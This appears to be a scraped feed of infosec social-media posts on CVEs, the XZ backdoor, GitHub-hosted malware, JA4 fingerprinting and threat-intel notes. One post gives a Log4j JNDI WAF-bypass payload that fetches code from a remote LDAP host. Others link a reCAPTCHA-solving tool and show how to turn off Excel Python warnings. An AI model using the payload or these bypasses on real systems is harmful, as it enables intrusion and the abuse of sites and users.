🚀 Google Recaptcha Solver

A Python script to solve Google reCAPTCHA using the DrissionPage library.

github.com/sarperavci/Goo…

#cybersecurity #infosec #bugbounty

A two-parts blog series on reverse engineering and vulnerability analysis of DJI drones' firmware.
Credits Nozomi Networks

Chain of weak Wi-Fi password cracking (CVE-2023-6951) followed by an unauthenticated HTTP APIs access (CVE-2023-6949) which allows for the exfiltration of

🖥 A good article to read as a short recap about XZ Backdoor.

#CVE #Vulnarability #Linux #infosec #Bug mawgoud.medium.com/xz-backdoor-cv…

The crux of the exploit lies in the persistence of files on GitHub’s CDN.

Files remain accessible even after the associated comment is deleted, a perfect setup for distributing malicious content.

Weeks later... GitHub bug still dropping malware 👌

17 AVs flag the newly released Team Fortress 2 64bit client as malware 😭

SHA256: 83fb94ef1accdc0071ef6221f8e5acf870a1df31ff26e04a8d58116402793911

we just shipped HuggingChat on iOS 💬

The app is super polished and gives you access to the community's best open AI models, on the go.

Give it a try!

link to Appstore below ⤵️

🚩Palo Alto Networks has released workaround guidance for a command injection vulnerability (CVE-2024-3400) affecting PAN-OS versions 10.2, 11.0 & 11.1. Apply workarounds asap 👉 cisa.gov/news-events/al…

In Critical Thinking - Bug Bounty Podcast Ep. 63 with Jason Haddix subdomain enumeration via reversed DMARC lookup was discussed (using dmarc.live). I have created a tool to automate these lookups: github.com/Tedixx/dmarc-s…

Really interesting how easy it is to fingerprint TLS connections established from GO applications, by checking JA4 signature patterns.

You'd be amazed how many automated malicious URL scanners also use the same JA4 signature.

From: github.com/FoxIO-LLC/ja4

#Telegram swiftly addresses a 0 day vulnerability in its Windows desktop app, fixing a typo that could have allowed malicious Python scripts to bypass security warnings & execute automatically.

#vulnerability #infosec #ZeroDay #Python

Source: ⬇️

bleepingcomputer.com/news/security/…

↠ Just a POV:

An advanced computer-brain interface enabled a woman who hadn't spoken for 18 years to communicate verbally once again.

✦ This time it is not a system, it is a human brain which might open the door for several fields including security ...

What do you think ?!

Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)

172.233.228[.]93

volexity.com/blog/2024/04/1…

#Log4j WAF Bypass:

Transforming invalid Unicode characters like

${jnd${upper:ı}:ldap:URL}

into a legitimate 'I' using the upper function and potentially other Java string techniques.

This technique successfully evades numerous WAFs implemented.

Credits: EsotericSpyro

Registry key settings for Microsoft Excel Python are found at

HKCU\software\policies\microsoft\office\16.0\excel\security\PythonFunctionWarnings.

DWORD:
- 0: Disables all security warnings.
- 1: Enables security warning for 'Enable-Content'.
- 2: Blocks all Python execution.

Ever want to test systems & see if your password is ever stored/sent in plaintext?

Make it: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

I am on the phone with a vendor right now because my test account is in an inoperable state.

🧐

NEWS! National Institute of Standards and Technology releases free, online introductory courses for the SP 800-53 security and privacy controls, SP 800-53A assessment procedures, and SP 800-53B control baselines.

Check them out: csrc.nist.gov/Projects/risk-…

2024-04-04 (Thursday): We generated an infection in a lab environment based on the latest round of #KoiLoader / #KoiStealer activity. Initial bank-themed lures started earlier this week on 2024-04-02. Some indicators available at bit.ly/3PQut3r

#Unit42ThreatIntel

Windows XP wallpapers in 2001